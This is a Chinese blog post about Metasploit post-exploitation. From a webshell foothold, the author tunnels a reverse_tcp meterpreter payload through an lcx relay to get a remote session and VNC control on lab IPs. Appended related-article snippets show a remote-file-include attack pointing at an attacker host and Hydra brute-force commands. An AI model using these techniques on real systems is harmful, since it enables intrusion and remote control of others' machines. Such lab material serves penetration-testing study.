metasploit php,Metasploit后渗透技巧[1]_91Ri.org

最新推荐文章于 2022-02-14 13:40:09 发布
最新推荐文章于 2022-02-14 13:40:09 发布
阅读量298 收藏
点赞数
文章标签: metasploit php

对于一次成功的渗透测试,往往都需要很多优秀的工具进行辅助。在渗透测试中听说用的最多的是一个叫做metasploit。因此想从屌丝脚本小子变成了土豪级脚本小子。所以开始了metasploit学习之旅,希望在记录下自己成长的足迹,把没有学习到知识点,无论大小都记录下来。因此有了下面和下下面的相关文章,如有错误请给予指正。

一、问题描述

在渗透测试时,metasploit往往作为后渗透工具,(因为远程溢出越来越少).我一般都是在获得一个webshell后,来使用metasploit进行信息采集,或者内网扫描等操作。而大多数站点都是内网ip。而本屌丝自己的机器也是内网ip,那么两个内网ip怎么建立连接?

二、解决方法

以前总是使用lcx做端口转发连接站点的3389,是否也可以用lcx将metasploit和站点两个内网ip进行连接?发现是可行的。具体操作步骤如下:

网络环境:

Metasploit:192.168.7.84

目标站点:   192.168.244.148

公网ip:   192.168.7.89

我的目的是将244.148 与7.84进行连接。大概过程如下:

1.在公网ip机器上使用lcx建立监听两个端口600、500

2.在metasploit中使用exploit/multi/handler模块,利用payload windows/meterpreter/bind_tcp 连接公网ip的600端口。(这相当于在公网ip上执行了windows/meterpreter/bind_tcp模块,绑定的端口是500)

3.制作一个msfpayload 模块选择windows/meterpreter/reverse_tcp,连接公网ip的500端口。这样可以将两个机器进行连接。

具体测试如下:

1)在公网ip上监听两个端口

e8c41e7048d5b0bfdb1644ae6b10e8e1.png

2) 在metasploit调用exploit/multi/handler 模块,这里使用资源加载方法,个人理解相当于windows的批处理功能。将要执行的命令存入文件,然后可以使用msf的resource功能加载,则里面的命令都会顺序执行。

3601fbb4b8b5302e709f1fd5dbaf7fb4.png

其中/tmp/rc/handle.rc中内容如下

e98c7677c05c1624f0f2ff45ffe44b35.png

然后执行exploit命令,开始执行

c3c67fde8d90db7ed1ffab500a35484f.png

则此时公网连接状态

c5c62995e850cf2b41c73f8add13d8bc.png

等待客户端进行连接。

现在使用msfpayload生成windows/meterpreter/reverse_tcp的payload

命令行下查看windows/meterpreter/reverse_tcp 需要的选项

25f547843cff09be6d755e006c6e06ec.png

需要两个参数LHOST和LPORT,分别是要连接的ip和端口,我这里需要连接的远程ip是192.168.7.89,端口是500

07e14b1dc65657a6f4238c2dd5db58f8.png

可以看到响应设置,这里有一个X,看一下表示的意思

95d38a047e7edbcc67cfbd11dc84fb1f.png

X其实表示的是exe的X,msfpayload支持很多种语言如P表示Perl,N表示Python等。

生成了payload需要传到目标站点上

在目标站点上执行payload,则公网的lcx开始转发数据

03c440c3a1cc6139da3cfd248c5ef3ae.png

获得一个meterpreter控制台

0e8ea1e05e34cfbc7028a174c190f6f3.png

可以开始进行执行命令了。

a702669a32239c42f124cdc4b363ffd7.png

如果你觉得命令行用着不爽,可以直接使用run vnc命令,获得一个gui操作。真牛叉。

【via@不扯淡】

weixin_39875028
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP文件包含漏洞 Metasploit
课嗨教育的专栏
11-13 2211
原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt 然后/lfi.php?file=http://5.5.5.3:1111/1.txt 启动METASPLOIT msf > use exploit/unix/webapp/php_include msf exploit(php_include) > set RHOST 5.5.5.2 RHOST => 5.5.5.2 msf exploit(php_in
Using the Metasploit PHP Remote File Include Module
cnbird's blog
05-24 1341
Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHP
metasploit-pro-trial-grabber:这是一个PHP命令行脚本,用于自动获取metasploit 14天专业试用版密钥
05-31
Metasploit Pro Trial Grabber 注意力 这个脚本不会再工作了! 介绍 这是一个 PHP 命令行脚本,用于自动获取 Metasploit 的 [14-DAYs pro trial key]。 真的很累,因为它每周都手动向 Metasploit 提交试用请求以获得 pro 密钥? 今天你有了新的选择! 只需运行此脚本并稍等片刻,它就会为您生成一个新的专业试用密钥。 它使用和来获取联系信息进行注册,都是假的和一次性的。 所有注册过程都是自动化的,所以现在享受吧! 捐款 如果您喜欢这个脚本,请给我买杯咖啡? 捐赠者 2014-07-23:匿名 - (~ 300TWD) 环境 Linux: :1.0.8 x86 视窗: Windows XP 专业服务包 3 x86 操作系统: :优胜美地 10.10 安装 Linux: # clone the
渗透之——Metasploit渗透php-utility-belt程序
冰河的专栏
01-17 1596
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86526103 攻击机 kali 192.168.109.137 靶机:Win XP 192.168.109.141 应用程序 php-utility-belt (可以到链接:https://download.csdn.net/download/l1028386804/109...
利用MetasploitPHP5.2.4渗透测试提权
渗透测试
05-06 1657
文章目录前言一、启动metasploit数据库二、PHP5.2.4渗透测试1.设置相关渗透模块2.提权总结 前言 针对PHP5.2.4进行渗透测试提权 一、启动metasploit数据库 启动metasploit在上一篇文章已经详细介绍 利用db_nmap扫描到的结果,在进行services -u 过滤结果 msf6 > services -u Services ======== host port proto name state info --
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit的使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
Metasploit_V4.20.zip
01-10
在网络安全领域,Metasploit不仅可以用于渗透测试,还可以帮助研究人员开发新的exploits,或者改进现有的利用代码。通过这个框架,用户可以学习如何利用已知漏洞,理解攻击链的各个阶段,以及如何有效地部署payloads...
Metasploit_Exploit_pitchw9a_渗透工具_metasploit_
09-30
通过阅读《Metasploit.pdf》这份文档,你可以深入了解到Metasploit的详细使用方法、exploit的开发和选择、payload的配置以及后渗透阶段的操作。这份资料将是你掌握Metasploit工具包,提升网络安全技能的重要资源。
metasploit中使用lnk漏洞渗透测试.doc
最新发布
03-18
设置目标机的 IP 地址,例如 `set RHOST 192.168.1.175`。 七、生成漏洞利用程序 使用 `exploit` 命令生成漏洞利用程序。 八、进行渗透测试 将生成的漏洞利用程序复制并在目标机上打开 IE,并输入该 URL,即可...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
IRC-Bot-Hunters:我为IRC僵尸网络编写的Metasploit PoC漏洞收集,允许RCE
05-24
IRC机器人猎人 我为IRC僵尸网络编写的Metasploit PoC攻击集合,该僵尸网络接管了僵尸程序的所有者,然后该僵尸程序允许远程执行代码。 大多数IRC僵尸网络可以通过使用其牧民的用户名或触发执行外壳程序执行的特定命令来接管。 Metasploit存储库中已接受此处的几乎所有模块。 如果您正在寻找C&C漏洞利用模块或使用后盖,例如r57 / c99 shell,我还制作了,已推送到主msf存储库中。 接受的Metasploit模块 w3tw0rk / Pitbul IRC bot的远程执行代码- Legend Perl IRC Bot远程执行代码-https: XDH / LinuxNet Perlbot / fBot IRC bot的远程执行代码- PHP IRC机器人PBOT的eval()远程执行代码(仅贷记) - 一些参考 w3tw0rk /斗犬的Perl IR
Metasploit - crack chinese caidao php backdoor
Nixawk
10-24 2841
Chopper Backdoor Client function set_action(){     // chopper_pwd  ---- Be used to set the input value // chopper_pass ---- PASSWORD to access the backdoor. // chopper_form ---- FORM to post t
利用Metasploit 打入ThinkPHP内网...
Ms08067安全实验室
07-06 1045
本文作者:dch(Ms08067实验室 SRSP TEAM小组成员)一、利用Metasploit进行攻击的流程图图1 Metasploit渗透流程二、Metasploit渗透攻击(1)通...
php-msf 负载均衡,Metasploit常用操作命令
weixin_30227565的博客
03-26 210
0x00 简述0x01基本操作1.启动MSF这里用的是kali里面的msf,需要开启msf依赖的数据库为PostgreSQL:service postgresql start# 启动 postgresql数据库msfconsole# 启动msf这样就算是启动成功了,左下角会变成msf >。2.配置和生成木马在kali下用ifconfig查询当前攻击机的ip,用于生成木马和配置监听。ifcon...
msf php脚本提权,利用Metasploit提权Linux主机思路
weixin_39640904的博客
04-11 705
本帖最后由 小爱_Joker 于 2017-3-9 13:28 编辑大晚上的写个文章不容易而且有点小冷利用metasploit提权Linux主机 主要就是用msf生成一个马子 上传到webshell打开马子后 你就会发现你的msf已经建立了一个回话 下面进入正题PHP Meterpretermetasploit有一个名为PHP Meterpreter的payload,可创建具有meterpre...
渗透流量加密
Scorpio_m7
02-14 4644
????写在前面 ????博客主页:Scorpio_m7,github ????欢迎关注????点赞????收藏⭐️留言???? ????本文由 Scorpio_m7原创,CSDN首发! ????首发时间:????2022年2月9日???? ✉️坚持和努力一定能换来诗与远方! ????作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! 文章目录????写在前面前言未加密OpenSSLnetcat流量加密Metasploit流量加密OpenSSL创建证书impersonate_ssl模块使用
渗透 1
qq_42364315的博客
07-22 2273
前言: 渗透的本质是信息搜集,信息的搜集整理为后续的情报跟进提供了保证。 后渗透的本质是权限把控,权限把控为后渗透提供了以牺牲时间换取空间的强大基础 首先,后渗透是什么意思?难道渗透还分前渗透和后渗透? 当然不是,后渗透渗透测试之后的一系列扫尾工作,当你通过“增删改查”等操作(任意文件上传, 任意文件下载, 任意文件删除 任意文件读取)拿到webshell之后再次提权拿到系统权限之后的...
metasploitphp_cgi,kali渗透metasploitable靶机
weixin_33783273的博客
03-18 287
扫描阶段:工具:Nmap隐蔽扫描 nmap -sS 192.168.8.135端口爆破:FTP、SSH等工具:Hydra备用字典爆破FTPhydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.8.135爆破SSHhydra -L /root/Desktop/user.txt -P /...
metasploit渗透之信息收集
weixin_43152809的博客
12-27 232
渗透工具:meterpreter 该工具具有多重功能,使后续的渗透变得更加容易 获取目标机的meterpreter shell后,就进入了后期渗透利用阶段 后期渗透模块有200多个 meterpreter优势: 纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,而且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用 meterpreter反弹shell方法 进程迁移 刚获得meterpreter shell时,该shell极其脆弱并且易受攻击
Metasploit渗透测试教程:从情报收集到后渗透攻击
"这篇文档包含了metasploit渗透学习的前五个部分,主要涉及渗透测试的流程,包括情报收集、威胁建模、漏洞分析、渗透攻击和后渗透攻击阶段。此外,提到了Backtrack的使用,并提及了白帽测试、黑盒测试以及漏洞扫描器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值